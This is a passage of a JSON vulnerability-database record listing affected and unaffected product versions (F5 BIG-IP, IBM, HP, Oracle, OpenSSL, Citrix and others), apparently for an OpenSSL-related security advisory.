"big-ip aam", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "12.1.0" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11150-11" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.8" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.1.1" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1" }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "2.0" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "qlogic 8gb intelligent pass-thru module \u0026 san switch module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.10.1.31.00" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "command center appliance", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.96" }, { "model": "aspera shares", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "1.0.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "bladecenter -t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8720" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3.23" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.5" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.2" }, { "model": "big-ip analytics", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "big-ip webaccelerator hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.2.1" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.3" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.6.156" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "initiate master data service patient hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "netscaler gateway", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.12" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.3" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.913" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.13" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "project openssl 1.0.0h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.13" }, { "model": "infosphere guardium database activity monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "infosphere master data management patient hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.0" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10" }, { "model": "sametime unified telephony", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.6" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.10" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.1" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.12" }, { "model": "flex system en4023 10gb scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.1" }, { "model": "flex system fc5022 16gb san scalable switch 7.2.1c", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.211" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8886" }, { "model": "cognos controller if4", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.10" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.9" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "enterprise manager ops center", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "12.2" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.4" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.7" }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.21" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "algo one pcre", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.7" }, { "model": "aspera ondemand", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.5" }, { "model": "big-ip analytics hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.5" }, { "model": "big-ip link controller hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.16" }, { "model": "aspera faspex", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.0.3" }, { "model": "big-ip afm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "12.1.0" }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "virtual connect enterprise manager sdk", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "abyp-2t-1s-1l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "big-ip edge gateway hf15", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.0.820" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "2.5.3" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "security network controller 1.0.3350m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "big-ip link controller hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip edge gateway 10.2.3-hf1", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.3" }, { "model": "aspera connect server", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.5.4" }, { "model": "icewall sso agent option", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.02007" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3" }, { "model": "websphere mq", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.213" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "infinity", "scope": "ne", "trust": 0.3, "vendor": "pexip", "version": "9.0" }, { "model": "big-ip asm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "12.1.0" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.6" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.1" }, { "model": "tssc/imc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.6" }, { "model": "netscaler application delivery controller", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "totalstorage san256b director model m48", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7967" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "abyp-2t-1s-1l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.1.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "big-ip afm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.68" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.2" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "abyp-10g-2sr-2lr-1-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.102" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.2" }, { "model": "big-ip pem", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "8.0" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.1.830" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8852" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "bladecenter -ht", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8750" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15-210" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.01" }, { "model": "big-ip gtm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "abyp-2t-2s-0l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "security proventia network enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "big-ip pem", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.6.1" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "2.3.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aspera connect server", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.5.2" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.2" }, { "model": "big-ip ltm hf15", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "tivoli netcool system service monitor fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.08" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.9.1" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "big-ip pem hf9", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.12.201" }, { "model": "big-ip ltm hf2", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.95" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.06" }, { "model": "big-ip gtm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.3" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "1.0" }, { "model": "cognos controller fp3 if2", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "big-ip analytics", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.4" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.8.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7.770" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "security network controller 1.0.3379m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.6" }, { "model": "project openssl 0.9.8za", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "abyp-0t-4s-0l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "algo one aggregation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.9" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "big-ip link controller hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "hp-ux b.11.11 (11i", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "v1)" }, { "model": "predictiveinsight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "big-ip edge gateway 11.0.0-hf2", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "system storage san384b", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.15" }, { "model": "system storage san80b-4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "abyp-4ts-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.07" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.96" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "big-ip edge gateway hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "flex system fc5022 16gb san scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "sterling connect:express for unix ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11150-11" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "infosphere master data management provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "big-ip apm hf2", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "algo one ase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.9" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.1" }, { "model": "abyp-10g-4lr-1-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "abyp-10g-4lr-1-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.2.127" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.800" }, { "model": "predictiveinsight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.10" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "algo one core", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.9" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.3" }, { "model": "sterling connect:express for unix ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-109" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.07" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.0" }, { "model": "predictiveinsight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "predictiveinsight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.2" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.1.0" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1881" }, { "model": "aspera orchestrator", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "2.2.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.1" }, { "model": "automation stratix", "scope": "ne", "trust": 0.3, "vendor": "rockwell", "version": "590015.6.3" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "big-ip psm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip gtm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-iq device hf3", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "4.5" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.9" }, { "model": "algo one mag", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.7" }, { "model": "abyp-0t-0s-4l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8v" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.11" }, { "model": "big-ip apm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aspera proxy", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "1.2.2" }, { "model": "abyp-4t-0s-0l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1-73" }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "contactoptimization", 